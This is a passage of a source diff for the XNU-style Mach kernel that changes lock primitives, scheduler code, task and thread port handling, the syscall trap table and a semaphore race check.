in preemptible context", lock); + } + return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp)); +} + /* * Routine: hw_lock_try * diff --git a/osfmk/kern/machine.c b/osfmk/kern/machine.c index 248790205..03f9287d4 100644 --- a/osfmk/kern/machine.c +++ b/osfmk/kern/machine.c @@ -75,7 +75,6 @@ #include #include -#include #include #include #include @@ -175,8 +174,6 @@ host_reboot( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - #if DEVELOPMENT || DEBUG if (options & HOST_REBOOT_DEBUGGER) { Debugger("Debugger"); @@ -466,8 +463,6 @@ host_get_boot_info( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - /* * Copy first operator string terminated by '\0' followed by * standardized strings generated from boot string. diff --git a/osfmk/kern/policy_internal.h b/osfmk/kern/policy_internal.h index fc1b4b6f4..f0a7f3535 100644 --- a/osfmk/kern/policy_internal.h +++ b/osfmk/kern/policy_internal.h @@ -158,6 +158,9 @@ extern void proc_inherit_task_role(task_t new_task, task_t old_task); #if CONFIG_IOSCHED #define IOSCHED_METADATA_TIER THROTTLE_LEVEL_TIER1 +#define IOSCHED_METADATA_EXPEDITED_TIER THROTTLE_LEVEL_TIER0 +_Static_assert(IOSCHED_METADATA_EXPEDITED_TIER < IOSCHED_METADATA_TIER, + "expedited metadata tier must be less than metadata tier"); #endif /* CONFIG_IOSCHED */ extern int proc_get_darwinbgstate(task_t task, uint32_t *flagsp); diff --git a/osfmk/kern/printf.c b/osfmk/kern/printf.c index 898086d8e..8acbbc8d4 100644 --- a/osfmk/kern/printf.c +++ b/osfmk/kern/printf.c @@ -365,7 +365,7 @@ __doprnt( if (c == 'z' || c == 'Z') { c = *++fmt; - if (sizeof(size_t) == sizeof(unsigned long)) { + if (sizeof(size_t) == sizeof(unsigned long long)) { long_long = 1; } } diff --git a/osfmk/kern/processor.c b/osfmk/kern/processor.c index 3cffb3fed..01aa936af 100644 --- a/osfmk/kern/processor.c +++ b/osfmk/kern/processor.c @@ -108,7 +108,9 @@ queue_head_t corpse_tasks; int tasks_count; int terminated_tasks_count; queue_head_t threads; +queue_head_t terminated_threads; int threads_count; +int terminated_threads_count; LCK_GRP_DECLARE(task_lck_grp, "task"); LCK_ATTR_DECLARE(task_lck_attr, 0, 0); LCK_MTX_DECLARE_ATTR(tasks_threads_lock, &task_lck_grp, &task_lck_attr); @@ -179,6 +181,7 @@ processor_bootstrap(void) queue_init(&tasks); queue_init(&terminated_tasks); queue_init(&threads); + queue_init(&terminated_threads); queue_init(&corpse_tasks); processor_init(master_processor, master_cpu, &pset0); @@ -1212,7 +1215,8 @@ processor_set_things( processor_set_t pset, void **thing_list, mach_msg_type_number_t *count, - int type) + int type, + mach_task_flavor_t flavor) { unsigned int i; task_t task; @@ -1344,7 +1348,7 @@ processor_set_things( /* for each task, make sure we are allowed to examine it */ for (i = used = 0; i < actual_tasks; i++) { - if (mac_task_check_expose_task(task_list[i])) { + if (mac_task_check_expose_task(task_list[i], flavor)) { task_deallocate(task_list[i]); continue; } @@ -1455,12 +1459,12 @@ processor_set_tasks_internal( processor_set_t pset, task_array_t *task_list, mach_msg_type_number_t *count, - int flavor) + mach_task_flavor_t flavor) { kern_return_t ret; mach_msg_type_number_t i; - ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK); + ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK, flavor); if (ret != KERN_SUCCESS) { return ret; } @@ -1469,7 +1473,12 @@ processor_set_tasks_internal( switch (flavor) { case TASK_FLAVOR_CONTROL: for (i = 0; i < *count; i++) { - (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]); + if ((*task_list)[i] == current_task()) { + /* if current_task(), return pinned port */ + (*task_list)[i] = (task_t)convert_task_to_port_pinned((*task_list)[i]); + } else { + (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]); + } } break; case TASK_FLAVOR_READ: @@ -1559,7 +1568,7 @@ processor_set_threads( kern_return_t ret; mach_msg_type_number_t i; - ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD); + ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD, TASK_FLAVOR_CONTROL); if (ret != KERN_SUCCESS) { return ret; } diff --git a/osfmk/kern/processor.h b/osfmk/kern/processor.h index eb2246cbd..16927ab17 100644 --- a/osfmk/kern/processor.h +++ b/osfmk/kern/processor.h @@ -291,7 +291,7 @@ struct pset_node { extern struct pset_node pset_node0; extern queue_head_t tasks, threads, corpse_tasks; -extern int tasks_count, terminated_tasks_count, threads_count; +extern int tasks_count, terminated_tasks_count, threads_count, terminated_threads_count; decl_lck_mtx_data(extern, tasks_threads_lock); decl_lck_mtx_data(extern, tasks_corpse_lock); @@ -300,6 +300,8 @@ decl_lck_mtx_data(extern, tasks_corpse_lock); */ extern queue_head_t terminated_tasks; +extern queue_head_t terminated_threads; + struct processor { processor_state_t state; /* See above */ bool is_SMT; diff --git a/osfmk/kern/sched_amp.c b/osfmk/kern/sched_amp.c index 2f06bca90..a757f709f 100644 --- a/osfmk/kern/sched_amp.c +++ b/osfmk/kern/sched_amp.c @@ -670,40 +670,6 @@ sched_amp_thread_group_recommendation_change(struct thread_group *tg, cluster_ty } #if DEVELOPMENT || DEBUG -extern int32_t sysctl_get_bound_cpuid(void); -int32_t -sysctl_get_bound_cpuid(void) -{ - int32_t cpuid = -1; - thread_t self = current_thread(); - - processor_t processor = self->bound_processor; - if (processor == NULL) { - cpuid = -1; - } else { - cpuid = processor->cpu_id; - } - - return cpuid; -} - -extern void sysctl_thread_bind_cpuid(int32_t cpuid); -void -sysctl_thread_bind_cpuid(int32_t cpuid) -{ - if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) { - return; - } - - processor_t processor = processor_array[cpuid]; - if (processor == PROCESSOR_NULL) { - return; - } - - thread_bind(processor); - - thread_block(THREAD_CONTINUE_NULL); -} extern char sysctl_get_bound_cluster_type(void); char @@ -765,6 +731,6 @@ sysctl_task_set_cluster_type(char cluster_type) thread_block(THREAD_CONTINUE_NULL); } -#endif +#endif /* DEVELOPMENT || DEBUG */ -#endif +#endif /* __AMP__ */ diff --git a/osfmk/kern/sched_average.c b/osfmk/kern/sched_average.c index f74e8b960..f2bd777ff 100644 --- a/osfmk/kern/sched_average.c +++ b/osfmk/kern/sched_average.c @@ -71,6 +71,7 @@ #if CONFIG_TELEMETRY #include #endif +#include #include @@ -112,6 +113,7 @@ static struct sched_average { { compute_stack_target, NULL, 5, 1 }, { compute_pageout_gc_throttle, NULL, 1, 0 }, { compute_pmap_gc_throttle, NULL, 60, 0 }, + { compute_zone_working_set_size, NULL, ZONE_WSS_UPDATE_PERIOD, 0 }, #if CONFIG_TELEMETRY { compute_telemetry, NULL, 1, 0 }, #endif diff --git a/osfmk/kern/sched_prim.c b/osfmk/kern/sched_prim.c index 640754947..adcec01c6 100644 --- a/osfmk/kern/sched_prim.c +++ b/osfmk/kern/sched_prim.c @@ -83,7 +83,6 @@ #include #include #include -#include #include #include #include @@ -687,6 +686,8 @@ thread_unblock( ctime = mach_absolute_time(); thread->realtime.deadline = thread->realtime.constraint + ctime; + KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_SET_RT_DEADLINE) | DBG_FUNC_NONE, + (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0); } /* @@ -2098,6 +2099,10 @@ restart: } } + bool secondary_forced_idle = ((processor->processor_secondary != PROCESSOR_NULL) && + (thread_no_smt(thread) || (thread->sched_pri >= BASEPRI_RTQUEUES)) && + (processor->processor_secondary->state == PROCESSOR_IDLE)); + /* OK, so we're not going to run the current thread. Look at the RT queue. */ bool ok_to_run_realtime_thread = sched_ok_to_run_realtime_thread(pset, processor); if ((rt_runq_count(pset) > 0) && ok_to_run_realtime_thread) { @@ -2174,6 +2179,10 @@ pick_new_rt_thread: ipi_type = sched_ipi_action(sprocessor, NULL, false, SCHED_IPI_EVENT_SMT_REBAL); ast_processor = sprocessor; } + } else if (secondary_forced_idle && !thread_no_smt(new_thread) && pset_has_stealable_threads(pset)) { + pset_update_processor_state(pset, sprocessor, PROCESSOR_DISPATCHING); + ipi_type = sched_ipi_action(sprocessor, NULL, true, SCHED_IPI_EVENT_PREEMPT); + ast_processor = sprocessor; } pset_unlock(pset); @@ -2428,8 +2437,6 @@ thread_invoke( thread->continuation = thread->parameter = NULL; - counter(c_thread_invoke_hits++); - boolean_t enable_interrupts = TRUE; /* idle thread needs to stay interrupts-disabled */ @@ -2444,7 +2451,6 @@ thread_invoke( } else if (thread == self) { /* same thread but with continuation */ ast_context(self); - counter(++c_thread_invoke_same); thread_unlock(self); @@ -2484,14 +2490,12 @@ thread_invoke( if (!thread->kernel_stack) { need_stack: if (!stack_alloc_try(thread)) { - counter(c_thread_invoke_misses++); thread_unlock(thread); thread_stack_enqueue(thread); return FALSE; } } else if (thread == self) { ast_context(self); - counter(++c_thread_invoke_same); thread_unlock(self); KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE, @@ -2521,8 +2525,6 @@ need_stack: thread_unlock(thread); - counter(c_thread_invoke_csw++); - self->reason = reason; processor->last_dispatch = ctime; @@ -2845,6 +2847,8 @@ thread_dispatch( * consumed the entire quantum. */ if (thread->quantum_remaining == 0) { + KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_CANCEL_RT_DEADLINE) | DBG_FUNC_NONE, + (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0); thread->realtime.deadline = UINT64_MAX; } } else { @@ -3103,8 +3107,6 @@ thread_dispatch( * thread resumes, it will execute the continuation function * on a new kernel stack. */ -counter(mach_counter_t c_thread_block_calls = 0; ) - wait_result_t thread_block_reason( thread_continue_t continuation, @@ -3116,8 +3118,6 @@ thread_block_reason( thread_t new_thread; spl_t s; - counter(++c_thread_block_calls); - s = splsched(); processor = current_processor(); @@ -6921,3 +6921,61 @@ thread_bind_cluster_type(thread_t thread, char cluster_type, bool soft_bound) (void)soft_bound; #endif /* __AMP__ */ } + +#if DEVELOPMENT || DEBUG +extern int32_t sysctl_get_bound_cpuid(void); +int32_t +sysctl_get_bound_cpuid(void) +{ + int32_t cpuid = -1; + thread_t self = current_thread(); + + processor_t processor = self->bound_processor; + if (processor == NULL) { + cpuid = -1; + } else { + cpuid = processor->cpu_id; + } + + return cpuid; +} + +extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid); +kern_return_t +sysctl_thread_bind_cpuid(int32_t cpuid) +{ + processor_t processor = PROCESSOR_NULL; + + if (cpuid == -1) { + goto unbind; + } + + if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) { + return KERN_INVALID_VALUE; + } + + processor = processor_array[cpuid]; + if (processor == PROCESSOR_NULL) { + return KERN_INVALID_VALUE; + } + +#if __AMP__ + + thread_t thread = current_thread(); + + if (thread->sched_flags & (TH_SFLAG_ECORE_ONLY | TH_SFLAG_PCORE_ONLY)) { + if ((thread->sched_flags & TH_SFLAG_BOUND_SOFT) == 0) { + /* Cannot hard-bind an already hard-cluster-bound thread */ + return KERN_NOT_SUPPORTED; + } + } + +#endif /* __AMP__ */ + +unbind: + thread_bind(processor); + + thread_block(THREAD_CONTINUE_NULL); + return KERN_SUCCESS; +} +#endif /* DEVELOPMENT || DEBUG */ diff --git a/osfmk/kern/simple_lock.h b/osfmk/kern/simple_lock.h index 67eb28971..7d08bea4b 100644 --- a/osfmk/kern/simple_lock.h +++ b/osfmk/kern/simple_lock.h @@ -76,10 +76,18 @@ #include #include -#ifdef MACH_KERNEL_PRIVATE +#ifdef XNU_KERNEL_PRIVATE + +#if MACH_KERNEL_PRIVATE #include #include +#endif + +__BEGIN_DECLS + +#pragma GCC visibility push(hidden) +#ifdef MACH_KERNEL_PRIVATE extern void hw_lock_init( hw_lock_t); @@ -97,6 +105,11 @@ extern unsigned int hw_lock_to( uint64_t, lck_grp_t*); +extern unsigned int hw_lock_to_nopreempt( + hw_lock_t, + uint64_t, + lck_grp_t*); + extern unsigned int hw_lock_try( hw_lock_t, lck_grp_t*); @@ -109,27 +122,36 @@ extern unsigned int hw_lock_try_nopreempt( extern void hw_lock_lock( hw_lock_t); - -#define hw_lock_lock(lck, grp) hw_lock_lock(lck) +#define hw_lock_lock(lck, grp) \ + hw_lock_lock(lck) extern void hw_lock_lock_nopreempt( hw_lock_t); -#define hw_lock_lock_nopreempt(lck, grp) hw_lock_lock_nopreempt(lck) +#define hw_lock_lock_nopreempt(lck, grp) \ + hw_lock_lock_nopreempt(lck) extern unsigned int hw_lock_to( hw_lock_t, uint64_t); -#define hw_lock_to(lck, timeout, grp) hw_lock_to(lck, timeout) +#define hw_lock_to(lck, timeout, grp) \ + hw_lock_to(lck, timeout) + +extern unsigned int hw_lock_to_nopreempt( + hw_lock_t, + uint64_t); +#define hw_lock_to_nopreempt(lck, timeout, grp) \ + hw_lock_to_nopreempt(lck, timeout) extern unsigned int hw_lock_try( hw_lock_t); -#define hw_lock_try(lck, grp) hw_lock_try(lck) +#define hw_lock_try(lck, grp) \ + hw_lock_try(lck) extern unsigned int hw_lock_try_nopreempt( hw_lock_t); -#define hw_lock_try_nopreempt(lck, grp) hw_lock_try_nopreempt(lck) - +#define hw_lock_try_nopreempt(lck, grp) \ + hw_lock_try_nopreempt(lck) #endif /* LOCK_STATS */ @@ -149,8 +171,10 @@ extern boolean_t hw_atomic_test_and_set32( enum memory_order ord, boolean_t wait); +extern void usimple_unlock_nopreempt( + usimple_lock_t); + #endif /* MACH_KERNEL_PRIVATE */ -#if XNU_KERNEL_PRIVATE struct usimple_lock_startup_spec { usimple_lock_t lck; @@ -167,10 +191,6 @@ extern void usimple_lock_startup_init( STARTUP_ARG(LOCKS_EARLY, STARTUP_RANK_FOURTH, usimple_lock_startup_init, \ &__startup_usimple_lock_spec_ ## var) -#endif /* XNU_KERNEL_PRIVATE */ - -__BEGIN_DECLS - extern void * hw_wait_while_equals( void **address, void *current); @@ -203,32 +223,35 @@ extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_duration( uint64_t, lck_grp_t*); #endif - #else extern void usimple_lock( usimple_lock_t); -#define usimple_lock(lck, grp) usimple_lock(lck) +#define usimple_lock(lck, grp) \ + usimple_lock(lck) extern unsigned int usimple_lock_try( usimple_lock_t); - -#define usimple_lock_try(lck, grp) usimple_lock_try(lck) +#define usimple_lock_try(lck, grp) \ + usimple_lock_try(lck) extern void usimple_lock_try_lock_loop( usimple_lock_t); -#define usimple_lock_try_lock_loop(lck, grp) usimple_lock_try_lock_loop(lck) +#define usimple_lock_try_lock_loop(lck, grp) \ + usimple_lock_try_lock_loop(lck) #if defined(__x86_64__) extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_deadline( usimple_lock_t, uint64_t); -#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl) +#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl) extern unsigned int usimple_lock_try_lock_mp_signal_safe_loop_duration( usimple_lock_t, uint64_t); -#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur) +#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur) #endif #endif /* LOCK_STATS */ @@ -237,24 +260,21 @@ extern void usimple_unlock( usimple_lock_t); -__END_DECLS - -#define ETAP_NO_TRACE 0 -#define ETAP_IO_AHA 0 - /* * If we got to here and we still don't have simple_lock_init * defined, then we must either be outside the osfmk component, * running on a true SMP, or need debug. */ #if !defined(simple_lock_init) -#define simple_lock_init(l, t) usimple_lock_init(l,t) -#define simple_lock(l, grp) usimple_lock(l, grp) -#define simple_unlock(l) usimple_unlock(l) -#define simple_lock_try(l, grp) usimple_lock_try(l, grp) +#define simple_lock_init(l, t) usimple_lock_init(l,t) +#define simple_lock(l, grp) usimple_lock(l, grp) +#define simple_unlock(l) usimple_unlock(l) +#define simple_lock_try(l, grp) usimple_lock_try(l, grp) #define simple_lock_try_lock_loop(l, grp) usimple_lock_try_lock_loop(l, grp) -#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) -#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) +#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) +#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) \ + usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) #define simple_lock_addr(l) (&(l)) #endif /* !defined(simple_lock_init) */ @@ -288,23 +308,27 @@ extern unsigned int hw_lock_bit_to( extern void hw_lock_bit( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit(lck, bit, grp) hw_lock_bit(lck, bit) +#define hw_lock_bit(lck, bit, grp) \ + hw_lock_bit(lck, bit) extern void hw_lock_bit_nopreempt( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_nopreempt(lck, bit, grp) hw_lock_bit_nopreempt(lck, bit) +#define hw_lock_bit_nopreempt(lck, bit, grp) \ + hw_lock_bit_nopreempt(lck, bit) extern unsigned int hw_lock_bit_try( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_try(lck, bit, grp) hw_lock_bit_try(lck, bit) +#define hw_lock_bit_try(lck, bit, grp) \ + hw_lock_bit_try(lck, bit) extern unsigned int hw_lock_bit_to( hw_lock_bit_t *, unsigned int, uint32_t); -#define hw_lock_bit_to(lck, bit, timeout, grp) hw_lock_bit_to(lck, bit, timeout) +#define hw_lock_bit_to(lck, bit, timeout, grp) \ + hw_lock_bit_to(lck, bit, timeout) #endif /* LOCK_STATS */ @@ -316,10 +340,16 @@ extern void hw_unlock_bit_nopreempt( hw_lock_bit_t *, unsigned int); -#define hw_lock_bit_held(l, b) (((*(l))&(1<ip_kobject; + sc = (suid_cred_t)ipc_kobject_get(port); ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); @@ -143,7 +143,7 @@ convert_suid_cred_to_port(suid_cred_t sc) } if (!ipc_kobject_make_send_lazy_alloc_port(&sc->port, - (ipc_kobject_t) sc, IKOT_SUID_CRED, false, 0)) { + (ipc_kobject_t) sc, IKOT_SUID_CRED, IPC_KOBJECT_ALLOC_NONE, false, 0)) { suid_cred_free(sc); return IP_NULL; } @@ -177,7 +177,7 @@ suid_cred_verify(ipc_port_t port, struct vnode *vnode, uint32_t *uid) return -1; } - sc = (suid_cred_t)port->ip_kobject; + sc = (suid_cred_t)ipc_kobject_get(port); if (vnode != sc->vnode) { ip_unlock(port); diff --git a/osfmk/kern/sync_sema.c b/osfmk/kern/sync_sema.c index 31ea5caae..dfa8d1153 100644 --- a/osfmk/kern/sync_sema.c +++ b/osfmk/kern/sync_sema.c @@ -180,6 +180,12 @@ semaphore_create( * the new semaphore to the task's semaphore list. */ task_lock(task); + /* Check for race with task_terminate */ + if (!task->active) { + task_unlock(task); + zfree(semaphore_zone, s); + return KERN_INVALID_TASK; + } enqueue_head(&task->semaphore_list, (queue_entry_t) s); task->semaphores_owned++; task_unlock(task); diff --git a/osfmk/kern/syscall_subr.c b/osfmk/kern/syscall_subr.c index 4d65fe2ae..60af738a8 100644 --- a/osfmk/kern/syscall_subr.c +++ b/osfmk/kern/syscall_subr.c @@ -58,7 +58,7 @@ #include #include #include -#include +#include #include #include #include @@ -131,8 +131,6 @@ swtch( } enable_preemption(); - counter(c_swtch_block++); - thread_yield_with_continuation((thread_continue_t)swtch_continue, NULL); } @@ -170,8 +168,6 @@ swtch_pri( } enable_preemption(); - counter(c_swtch_pri_block++); - thread_depress_abstime(thread_depress_time); thread_yield_with_continuation((thread_continue_t)swtch_pri_continue, NULL); diff --git a/osfmk/kern/syscall_sw.c b/osfmk/kern/syscall_sw.c index f6a6c7ad7..9a2484022 100644 --- a/osfmk/kern/syscall_sw.c +++ b/osfmk/kern/syscall_sw.c @@ -115,7 +115,7 @@ const mach_trap_t mach_trap_table[MACH_TRAP_TABLE_COUNT] = { /* 10 */ MACH_TRAP(_kernelrpc_mach_vm_allocate_trap, 4, 5, munge_wwlw), /* 11 */ MACH_TRAP(_kernelrpc_mach_vm_purgable_control_trap, 4, 5, munge_wlww), /* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll), -/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL), +/* 13 */ MACH_TRAP(task_dyld_process_info_notify_get_trap, 2, 4, munge_ll), /* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww), /* 15 */ MACH_TRAP(_kernelrpc_mach_vm_map_trap, 6, 8, munge_wwllww), /* 16 */ MACH_TRAP(_kernelrpc_mach_port_allocate_trap, 3, 3, munge_www), @@ -233,7 +233,7 @@ const mach_trap_t mach_trap_table[MACH_TRAP_TABLE_COUNT] = { /* 127 */ MACH_TRAP(kern_invalid, 0, 0, NULL), }; -const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { +const char * const mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 0 */ "kern_invalid", /* 1 */ "kern_invalid", /* 2 */ "kern_invalid", @@ -247,7 +247,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 10 */ "_kernelrpc_mach_vm_allocate_trap", /* 11 */ "kern_invalid", /* 12 */ "_kernelrpc_mach_vm_deallocate_trap", -/* 13 */ "kern_invalid", +/* 13 */ "task_dyld_process_info_notify_get_trap", /* 14 */ "_kernelrpc_mach_vm_protect_trap", /* 15 */ "_kernelrpc_mach_vm_map_trap", /* 16 */ "_kernelrpc_mach_port_allocate_trap", @@ -368,7 +368,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = { /* 127 */ "kern_invalid", }; -int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0])); +const int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0])); kern_return_t kern_invalid( diff --git a/osfmk/kern/syscall_sw.h b/osfmk/kern/syscall_sw.h index 2816a65fc..c15f8f097 100644 --- a/osfmk/kern/syscall_sw.h +++ b/osfmk/kern/syscall_sw.h @@ -88,7 +88,7 @@ typedef struct { extern const mach_trap_t mach_trap_table[]; -extern int mach_trap_count; +extern const int mach_trap_count; #if CONFIG_REQUIRES_U32_MUNGING || (__arm__ && (__BIGGEST_ALIGNMENT__ > 4)) diff --git a/osfmk/kern/task.c b/osfmk/kern/task.c index 1ace4c3ec..1266acd83 100644 --- a/osfmk/kern/task.c +++ b/osfmk/kern/task.c @@ -166,6 +166,7 @@ #include #include +#include #include /* picks up ledger.h */ @@ -213,6 +214,10 @@ LCK_SPIN_DECLARE_ATTR(dead_task_statistics_lock, &task_lck_grp, &task_lck_attr); ledger_template_t task_ledger_template = NULL; +/* global lock for task_dyld_process_info_notify_{register, deregister, get_trap} */ +LCK_GRP_DECLARE(g_dyldinfo_mtx_grp, "g_dyldinfo"); +LCK_MTX_DECLARE(g_dyldinfo_mtx, &g_dyldinfo_mtx_grp); + SECURITY_READ_ONLY_LATE(struct _task_ledger_indices) task_ledgers __attribute__((used)) = {.cpu_time = -1, .tkm_private = -1, @@ -1318,6 +1323,8 @@ task_create_internal( return KERN_RESOURCE_SHORTAGE; } + counter_alloc(&(new_task->faults)); + #if defined(HAS_APPLE_PAC) ml_task_set_rop_pid(new_task, parent_task, inherit_memory); ml_task_set_jop_pid(new_task, parent_task, inherit_memory); @@ -1447,6 +1454,8 @@ task_create_internal( new_task->requested_policy = default_task_requested_policy; new_task->effective_policy = default_task_effective_policy; + new_task->task_shared_region_slide = -1; + task_importance_init_from_parent(new_task, parent_task); if (parent_task != TASK_NULL) { @@ -1551,7 +1560,6 @@ task_create_internal( new_task->total_system_time = 0; new_task->total_ptime = 0; new_task->total_runnable_time = 0; - new_task->faults = 0; new_task->pageins = 0; new_task->cow_faults = 0; new_task->messages_sent = 0; @@ -1700,7 +1708,7 @@ task_rollup_accounting_info(task_t to_task, task_t from_task) to_task->total_system_time = from_task->total_system_time; to_task->total_ptime = from_task->total_ptime; to_task->total_runnable_time = from_task->total_runnable_time; - to_task->faults = from_task->faults; + counter_add(&to_task->faults, counter_load(&from_task->faults)); to_task->pageins = from_task->pageins; to_task->cow_faults = from_task->cow_faults; to_task->decompressions = from_task->decompressions; @@ -1906,6 +1914,8 @@ task_deallocate( btlog_remove_entries_for_element(task_ref_btlog, task); #endif + counter_free(&task->faults); + #if CONFIG_COALITIONS task_release_coalitions(task); #endif /* CONFIG_COALITIONS */ @@ -2270,7 +2280,7 @@ task_mark_corpse(task_t task) task_add_to_corpse_task_list(task); task_start_halt(task); - thread_terminate_internal(self_thread); + thread_terminate_internal(self_thread, TH_TERMINATE_OPTION_NONE); (void) thread_interrupt_level(wsave); assert(task->halting == TRUE); @@ -2298,6 +2308,7 @@ task_clear_corpse(task_t task) { thread_mtx_lock(th_iter); th_iter->inspection = FALSE; + ipc_thread_disable(th_iter); thread_mtx_unlock(th_iter); } @@ -2356,7 +2367,7 @@ task_port_with_flavor_notify(mach_msg_header_t *msg) ip_unlock(port); return; } - task = (task_t)port->ip_kobject; + task = (task_t)ipc_kobject_get(port); kotype = ip_kotype(port); if (task != TASK_NULL) { assert((IKOT_TASK_READ == kotype) || (IKOT_TASK_INSPECT == kotype)); @@ -2369,29 +2380,40 @@ task_port_with_flavor_notify(mach_msg_header_t *msg) return; } + if (kotype == IKOT_TASK_READ) { + flavor = TASK_FLAVOR_READ; + } else { + flavor = TASK_FLAVOR_INSPECT; + } + itk_lock(task); ip_lock(port); - require_ip_active(port); /* + * If the port is no longer active, then ipc_task_terminate() ran + * and destroyed the kobject already. Just deallocate the task + * ref we took and go away. + * + * It is also possible that several nsrequests are in flight, + * only one shall NULL-out the port entry, and this is the one + * that gets to dealloc the port. + * * Check for a stale no-senders notification. A call to any function * that vends out send rights to this port could resurrect it between * this notification being generated and actually being handled here. */ - if (port->ip_srights > 0) { + if (!ip_active(port) || + task->itk_task_ports[flavor] != port || + port->ip_srights > 0) { ip_unlock(port); itk_unlock(task); task_deallocate(task); return; } - if (kotype == IKOT_TASK_READ) { - flavor = TASK_FLAVOR_READ; - } else { - flavor = TASK_FLAVOR_INSPECT; - } - assert(task->itk_self[flavor] == port); - task->itk_self[flavor] = IP_NULL; - port->ip_kobject = IKOT_NONE; + assert(task->itk_task_ports[flavor] == port); + task->itk_task_ports[flavor] = IP_NULL; + + ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); itk_unlock(task); task_deallocate(task); @@ -2705,7 +2727,7 @@ task_terminate_internal( * Terminate each thread in the task. */ queue_iterate(&task->threads, thread, thread_t, task_threads) { - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); } #ifdef MACH_BSD @@ -2931,7 +2953,7 @@ task_start_halt_locked(task_t task, boolean_t should_mark_corpse) thread_mtx_unlock(thread); } if (thread != self) { - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); } } task->dispatchqueue_offset = dispatchqueue_offset; @@ -3224,6 +3246,8 @@ task_threads_internal( return KERN_INVALID_ARGUMENT; } + assert(flavor <= THREAD_FLAVOR_INSPECT); + for (;;) { task_lock(task); if (!task->active) { @@ -3315,8 +3339,14 @@ task_threads_internal( switch (flavor) { case THREAD_FLAVOR_CONTROL: - for (i = 0; i < actual; ++i) { - ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); + if (task == current_task()) { + for (i = 0; i < actual; ++i) { + ((ipc_port_t *) thread_list)[i] = convert_thread_to_port_pinned(thread_list[i]); + } + } else { + for (i = 0; i < actual; ++i) { + ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); + } } break; case THREAD_FLAVOR_READ: @@ -3329,8 +3359,6 @@ task_threads_internal( ((ipc_port_t *) thread_list)[i] = convert_thread_inspect_to_port(thread_list[i]); } break; - default: - return KERN_INVALID_ARGUMENT; } } @@ -3550,7 +3578,8 @@ task_suspend( * notification on that port (if none outstanding). */ (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_resume, - (ipc_kobject_t)task, IKOT_TASK_RESUME, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_resume")); + (ipc_kobject_t)task, IKOT_TASK_RESUME, IPC_KOBJECT_ALLOC_NONE, true, + OS_PTRAUTH_DISCRIMINATOR("task.itk_resume")); port = task->itk_resume; task_unlock(task); @@ -3559,12 +3588,19 @@ task_suspend( * but we'll look it up when calling a traditional resume. Any IPC operations that * deallocate the send right will auto-release the suspension. */ - if ((kr = ipc_kmsg_copyout_object(current_task()->itk_space, ip_to_object(port), - MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, &name)) != KERN_SUCCESS) { - printf("warning: %s(%d) failed to copyout suspension token for pid %d with error: %d\n", - proc_name_address(current_task()->bsd_info), proc_pid(current_task()->bsd_info), + if (IP_VALID(port)) { + kr = ipc_object_copyout(current_space(), ip_to_object(port), + MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, + NULL, NULL, &name); + } else { + kr = KERN_SUCCESS; + } + if (kr != KERN_SUCCESS) { + printf("warning: %s(%d) failed to copyout suspension " + "token for 